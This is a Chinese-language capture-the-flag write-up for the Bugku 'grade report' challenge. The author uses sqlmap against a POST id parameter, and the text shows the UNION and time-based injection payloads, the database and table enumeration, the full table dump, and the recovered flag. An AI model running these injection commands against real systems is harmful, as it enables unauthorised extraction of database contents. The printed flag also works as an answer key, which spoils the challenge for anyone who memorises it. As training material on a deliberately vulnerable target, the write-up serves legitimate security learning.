bugku 成绩单

成绩单

90

快来查查成绩吧
http://120.24.86.145:8002/chengjidan/

查看元素和查看源代码后无果

用sqlmap检测sql注入

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1"

得到

POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 89 HTTP(s) requests:
---
Parameter: id (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'fELh'='fELh

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-7971' UNION ALL SELECT NULL,NULL,CONCAT(0x71706a6a71,0x4156665a546b554a6a64424c6354514d526f575257527a65414d586d516d6a765548776476594570,0x716b707671),NULL-- ErNP
---
[11:01:58] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

检测到了后台数据库是mysql

然后列举数据库管理系统中的所有数据库

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" --dbs

得到

available databases [2]:
[*] information_schema
[*] skctf_flag

也就是有两个数据库,然后列出数据库skctf_flag的所有表

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --tables

得到

Database: skctf_flag
[2 tables]
+------+
| fl4g |
| sc   |
+------+

也就是有两个表,不知道flag在哪个表里,就把两个表都列举出来吧

python2 sqlmap.py -u "http://120.24.86.145:8002/chengjidan/index.php" --data="id=1" -D skctf_flag --dump

得到

Database: skctf_flag
Table: sc
[3 entries]
+----+------+------+---------+---------+
| id | name | math | chinese | english |
+----+------+------+---------+---------+
| 1  | 龙龙龙  | 60   | 70      | 60      |
| 2  | 浩儿   | 70   | 74      | 84      |
| 3  | 静静   | 80   | 90      | 85      |
+----+------+------+---------+---------+

[11:13:09] [INFO] table 'skctf_flag.sc' dumped to CSV file 'C:\Users\Administrator\.sqlmap\output\120.24.86.145\dump\skctf_flag\sc.csv'
[11:13:09] [INFO] fetching columns for table 'fl4g' in database 'skctf_flag'
[11:13:09] [INFO] used SQL query returns 1 entries
[11:13:09] [INFO] fetching entries for table 'fl4g' in database 'skctf_flag'
[11:13:09] [INFO] used SQL query returns 1 entries
[11:13:09] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[11:13:09] [INFO] fetching number of entries for table 'fl4g' in database 'skctf_flag'
[11:13:09] [WARNING] time-based comparison requires larger statistical model, please wait................  (done)
[11:13:11] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
1
[11:17:50] [WARNING] (case) time-based comparison requires reset of statistical model, please wait..............................  (done)
[11:18:03] [INFO] adjusting time delay to 2 seconds due to good response times
BUGKU

[11:18:42] [ERROR] invalid character detected. retrying..
[11:18:42] [WARNING] increasing time delay to 3 seconds
{Sq

[11:20:01] [ERROR] invalid character detected. retrying..
[11:20:01] [WARNING] increasing time delay to 4 seconds
l_INJE

[11:21:48] [ERROR] invalid character detected. retrying..
[11:21:48] [WARNING] increasing time delay to 5 seconds
CT0N_4

[11:24:01] [ERROR] invalid character detected. retrying..
[11:24:01] [WARNING] increasing time delay to 6 seconds
81

[11:24:54] [ERROR] invalid character detected. retrying..
[11:24:54] [WARNING] increasing time delay to 7 seconds
3dr

[11:26:24] [ERROR] invalid character detected. retrying..
[11:26:24] [WARNING] increasing time delay to 8 seconds
d

[11:27:10] [ERROR] invalid character detected. retrying..
[11:27:10] [WARNING] increasing time delay to 9 seconds
8hz4}
Database: skctf_flag
Table: fl4g
[1 entry]
+---------------------------------+
| skctf_flag                      |
+---------------------------------+
| BUGKU{Sql_INJECT0N_4813drd8hz4} |
+---------------------------------+

 

你可能感兴趣的:(BugkuCTF)